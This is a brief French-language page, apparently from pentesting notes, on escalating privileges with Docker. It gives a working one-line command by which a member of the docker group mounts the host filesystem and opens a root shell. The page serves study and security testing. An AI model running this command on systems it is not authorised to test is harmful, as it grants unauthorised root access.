[Privesc] Docker

Introduction

Cette page décrit les techniques utilisées pour monter son niveau de privilège grâce à docker.

Techniques

Utilisateur dans le groupe docker

Si vous avez accès à un compte utilisateur appartenant au groupe docker et pouvant exécuter des commandes docker, vous pourrez créer un conteneur qui exécutera un shell root grâce à la commande suivante :

docker run -v /:/mnt --rm -it alpine chroot /mnt sh